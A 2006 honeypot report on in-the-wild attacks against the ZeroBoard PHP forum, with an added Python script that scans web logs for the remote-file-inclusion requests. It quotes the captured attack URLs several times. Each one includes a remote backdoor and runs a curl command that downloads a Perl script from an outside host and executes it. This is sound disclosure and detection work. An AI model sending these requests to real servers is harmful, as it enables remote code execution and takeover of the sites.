ZeroBoard Attacks in the Wild
Written by Mark Ryan Talabis   
Monday, 12 June 2006

We have been picking up increased ZeroBoard directed attacks in our honeypots. Zeroboard is one of the most popular PHP web boards in Korea.

In the following examples from one of our honeypots, the attack uses an old ZeroBoard vulnerability that may allow a remote attacker to execute arbitrary commands:

/bbs/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w 

/board/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w

/zeroboard/bbs/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w

/zboard/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w

The issue is due to the 'error.php' script not properly sanitizing user input supplied to the 'dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands, which will then be executed by the vulnerable script. In the examples above, a backdoor program called "cmd2.gif" is being used to fetch and execute a malicious Perl script called "w0w". The actual packets can be studied here.
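The requests above leave a distinctive trace in a web server's access log: a request to 'zero_vote/error.php' whose 'dir' parameter is a full URL rather than a local path, followed by a 'cmd' parameter. The script below is an added example (not code from the original post or from the ZeroBoard project) that scans Apache-style log lines for that pattern and pulls out the remote include URL, the decoded command and any further download URLs the command references, so the hits can be used as indicators for the rest of the environment. The log lines are constructed for this example (client IPs, timestamps and user agents are made up; the request paths are modelled on the honeypot captures quoted above). It goes slightly beyond the post by flagging any parameter on the watched script whose value starts with a URL scheme, not only 'dir'.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log sample: two remote-inclusion attempts modelled on the
# honeypot captures, one benign request to the same script, one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2006:03:14:07 +0800] "GET /bbs/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.5 - - [12/Jun/2006:03:14:09 +0800] "GET /zboard/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w HTTP/1.1" 404 210 "-" "Mozilla/4.0"
10.0.0.9 - - [12/Jun/2006:03:20:41 +0800] "GET /bbs/skin/zero_vote/error.php?dir=skin/zero_vote HTTP/1.1" 200 180 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jun/2006:03:21:02 +0800] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Scripts whose parameters we inspect; the vulnerable ZeroBoard script from the post.
WATCHED_SCRIPTS = ("/zero_vote/error.php",)

# Minimal combined-log parser: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A parameter value that is itself a remote URL is the remote-file-inclusion signature.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# URLs embedded in a shell-style command; stop at separators so ';perl' is not swallowed.
URL_IN_CMD_RE = re.compile(r'(?:https?|ftp)://[^\s;|&]+', re.IGNORECASE)


def split_query(query):
    """Split a raw query string on '&' only and URL-decode keys and values.

    urllib.parse.parse_qs is deliberately avoided: older versions also split on ';',
    which would chop a command such as 'cd /tmp;curl ...' into unrelated fragments.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def inspect_line(line):
    """Return a hit record for a remote-inclusion attempt, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith(WATCHED_SCRIPTS):
        return None
    params = split_query(query)
    # Any parameter whose value starts with a scheme, not just 'dir', is suspicious here.
    remote_params = {k: v for k, v in params.items() if REMOTE_RE.match(v)}
    if not remote_params:
        return None
    cmd = params.get("cmd")
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "script": path,
        "include_url": remote_params.get("dir"),   # trailing '?' is kept as captured
        "remote_params": sorted(remote_params),
        "cmd": cmd,
        "fetched_urls": URL_IN_CMD_RE.findall(cmd) if cmd else [],
    }


def scan_log(text):
    """Scan a whole log and return the list of hit records in file order."""
    return [hit for hit in (inspect_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} {hit['script']} status={hit['status']}")
        print(f"  include: {hit['include_url']}")
        print(f"  cmd:     {hit['cmd']}")
        print(f"  fetches: {', '.join(hit['fetched_urls'])}")
```

Note that the second hit has a 404 status: a miss still records the attacker scanning for the board under different directory names, which is exactly what the four captured paths show, so the scanner reports hits regardless of status code and leaves it to the analyst to separate probes from successful inclusions.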

The source site shown in the example has already been suspended, though there is always the possibility of multiple sources for the attack. We could get no info regarding patch availability since the ZeroBoard website is in Korean.

Last Updated ( Wednesday, 06 January 2010 )